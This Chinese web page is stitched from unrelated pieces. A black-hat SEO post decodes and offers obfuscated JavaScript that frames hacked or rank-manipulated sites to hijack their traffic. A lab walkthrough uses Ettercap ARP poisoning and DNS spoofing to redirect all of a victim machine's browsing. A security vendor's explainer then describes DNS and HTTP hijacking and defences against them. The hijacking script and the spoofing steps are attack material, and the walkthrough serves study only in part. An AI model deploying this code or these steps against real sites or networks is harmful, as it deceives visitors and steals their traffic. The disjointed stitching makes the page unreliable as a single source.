說到黑帽什么的你們就非常的感興趣,那也沒辦法,畢竟黑帽神秘又厲害,一周就有效果。
有關黑帽的具體操作網上少之又少,基本都標題黨。
剛好最近碰到一個群友在吹他的快排,就拿他的來做個講解。
我看了他的網站,就只能看出JS劫持,其他我也不懂,就講講這個吧。
暫時他有三個網站,指數5000左右的詞都排首頁前5位,大家先看看數據(提醒:拿別人的網站來分析,切勿放上網址及網站信息,斷人財路等于殺人放火)
短時間內有這樣的數據,50%做了快排。
這樣看快排的幾率90%了
這里提醒下各位站長,快排來得快去得也快,這是鐵律。能給你幾個月的快感,百度一更新就難翻身,切記切記。
但我個人比較向往黑帽,因為厲害啊。
看了他的網站代碼,里面都有一個奇怪的JS代碼
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x77\x72\x69\x74\x65\x6c\x6e']("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65 \x3d
\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3e");window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x77\x72\x69\x74\x65\x6c\x6e']
("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\"\x3c\x66\x72\x61\x6d\x65\x73\x65\x74 \x72\x6f\x77\x73\x3d\x27\x31\x30\x30\x25\x2c\x2a\x27
\x66\x72\x61\x6d\x65\x62\x6f\x72\x64\x65\x72\x3d\x27\x4e\x4f\x27 \x62\x6f\x72\x64\x65\x72\x3d\x27\x30\x27
\x66\x72\x61\x6d\x65\x73\x70\x61\x63\x69\x6e\x67\x3d\x27\x30\x27\x3e\"\x29\x3b");window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x77\x72\x69\x74\x65\x6c\x6e']
("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\"\x3c\x66\x72\x61\x6d\x65 \x6e\x61\x6d\x65\x3d\x27\x6d\x61\x69\x6e\x27
\x73\x72\x63\x3d\x27\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\u4f60\u7684\u7f51\u5740\x2e\x63\x6f\x6d\x27
\x73\x63\x72\x6f\x6c\x6c\x69\x6e\x67\x3d\x79\x65\x73\x3e\"\x29\x3b");window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x77\x72\x69\x74\x65\x6c\x6e']
('\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x2f\x66\x72\x61\x6d\x65\x73\x65\x74\x3e\x22\x29\x3b');window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]
['\x77\x72\x69\x74\x65\x6c\x6e']("\x\x33\x63\x2f\x73\x63\x72\x69\x70\x74\x3e");
是不是很奇怪
其實這個是經過加密的JS劫持代碼,經常會出現在被黑的網站里面,劫持流量。
解密后發現都是指向一個網站,我們再看看那個網站的數據
能肯定這個估計就是主站了,手法就是通過快排一些網站上排位然后JS劫持流量到主站做排名。
那肯定你們會問,為什么這么大費周章不直接就去快排主站算了。
因為主站不能被K,而快排站無所謂,說明一下,百度蜘蛛現在是不能識別JS代碼的,一旦懲罰,主站不會被牽連,
而且這位朋友手法成熟,快排站與主站做的行業和關鍵詞都一致,一旦跳轉,主站的流量來源都會是行業關鍵詞,想法很好。
好了,點到為止,希望能給你們一點幫助,最后奉上JS代碼。
document.writeln("<script language = javascript>");
document.writeln("document.write(\"<frameset rows='100%,*' frameborder='NO' border='0' framespacing='0'>\");");
document.writeln("document.write(\"<frame name='main' src='http://www.你的網址.com' scrolling=yes>\");");
document.writeln('document.write("</frameset>");');
document.writeln("\x3c/script>");
熱點資訊
SEO基本功:站內優化的一些基本手段
SEO進階必修課:如何創建和管理高質量關鍵詞詞庫
春風十里,不如你
內容純屬技術記錄,切勿用來做違法事情
受害方:win 10
攻擊方:kali linux
win 10:10.1.1.20
kali linux:10.1.1.128
網關:10.1.1.1
兩臺電腦第一次聯系時,
第一臺會通過ARP廣播的形式來獲取對方mac地址
第二臺收到第一臺的ARP廣播報文后通過解析再單播應答回去
至此,兩臺電腦成功建立聯系;
假設有第三臺電腦獲得第一個ARP廣播報文的內容后,
多次向報文中的源ip單播應答
則第一臺將會把第三臺電腦誤認為是第二臺電腦
至此,攻擊成功。
首先準備好一個網頁,如下
將該網頁放到如下位置
/var/www/html/
并改名為index.html
啟動apache服務
systemctl start apache2
打開瀏覽器,檢查網頁是否正常運行
打開Ettercap的配置文件
leafpad /etc/ettercap/etter.dns
在最后面加上下面這行,保存退出
*.com A 10.1.1.128
到了這里,準備工作都差不多搞定了
接下來,ping下win 10,可以ping通
打開Ettercap工具
ettercap -G
確定網卡是自己的eth0后,點擊右上方的勾
接著,先停掉這個工具的運行,點擊放大鏡的圖標
再點擊下上面紅色框的圖標,就能發現win 10以及網關的ip
把網關ip給Target1,把win 10的ip給Target2
接著,選擇框中的圖標,點ARP poisoning選項
彈出來的界面全部勾上
點擊省略號---Plugins---Manage plugins
雙擊dns_spoof
這時候,就可以發動攻擊了
win10用瀏覽器訪問百度,劫持成功!
訪問一個不存在的網站測試,劫持成功
再看后臺,訪問記錄統統捕獲
也就是說,不管現在這臺win10訪問什么網站都好,都只會訪問到部署好的頁面
是英俊瀟灑,技術過硬的網盾運維攻城獅龜哥。
今天來跟大家聊一聊下載劫持,劫持主要分類兩大類:DNS劫持和HTTP劫持。而HTTP劫持最常見的就是3XX跳轉劫持,JS劫持以及HTML劫持。
眾所周知,CDN的全稱是Content Delivery Network,即內容分發網絡,主要是提高網站的速度,可以優化網站的訪問速度,提高網站的安全性和穩定性。
什么你只知道CDN能加速?那么CDN本身是一種DNS劫持你知道嗎?不過放心,它是良性的,不同于黑客強制DNS把域名解析到自己的釣魚IP上,CDN是讓DNS主動配合,把域名解析到臨近的服務器上。
同時服務器開啟HTTP代理,讓用戶感覺不到CDN的存在。而且CDN劫持不像海王那樣不挑食,劫持用戶所有流量。CDN比較專一只“劫持”用戶的靜態資源訪問,對于之前用戶訪問過的資源,CDN將直接從本地緩存里反饋給用戶,因此速度有了很大的提升。
DNS劫持
正常DNS解析的流程是用戶走localdns,通過運營商提供的遞歸DNS進行域名解析。而DNS劫持一般發生在LDNS(遞歸dns)這一層。
DNS劫持有這三種情況:
1.錯誤域名解析到糾錯導航頁面,導航頁面存在廣告;
2.錯誤域名解析到非正常頁面 ;
3.直接將特點站點解析到惡意或者廣告頁面 。
HTTP劫持
HTTP劫持是指在傳輸過程中,劫持方偽裝成目的服務器搶先給出了響應,使得客戶端接受了劫持的響應而拋棄了正確的響應,就是先下手為強,后下手遭殃。甚至有時候劫持方會完全攔截用戶的請求,目的服務器沒有接受到任何請求。
在HTTP劫持中,3XX跳轉,JS內容篡改以及html內容篡改都可能會發生。目前看3XX跳轉和JS內容篡改比較常見。
劫持方想要達成的目的是默默的賺錢,因此這就決定了劫持方不可能猖獗到劫持整個域名的http請求。一般是通過過濾識別http請求的特征碼來判斷是否要進行劫持。
那么我們有兩種防劫持思路
1.采用https協議加密請求。
2.隱藏http請求的特征,例如使用對稱加密算法加密整個url。
https可以說是防止劫持的終極思路,但是https多了ssl握手的過程,會耗費一定的時間和性能,必須要考慮到時間影響和CDN節點的性能影響。另外https一般分為兩種,一種是傳統https(合用證書),一種是https sni。
目前的主流是https sni,但選用的時候必須確認好具體的業務需求,因為市面上還殘留著一些老舊版本的瀏覽器。
URL加密也是經常用來防止劫持的做法。市面上的各大手機應用商店都采用了這種做法。相較于https,url加密的兼容性更好,并且對CDN節點帶來的解密額外負擔可以忽略,但是url加密需要CDN節點的密切配合。
通常是選中一種對稱加密算法,調用加密后的url。用戶向CDN節點發起請求,CDN節點會解密url,獲取真實的url并且響應給用戶。
由于劫持方一般通過對url進行匹配決定是否進行劫持,因此這種url加密的方式也可以很好的防止劫持。
通俗的來講,DNS劫持就是你想去存錢運營商卻把你拉到了劫匪手中;而HTTP劫持就是你從服務器買了一份飯電信給你放了一坨屎。
過以上的內容,相信機智的網友們已經知道了什么是DNS劫持和HTTP劫持以及應對方法,如果還有什么疑問歡迎來撩龜哥~
*請認真填寫需求信息,我們會在24小時內與您取得聯系。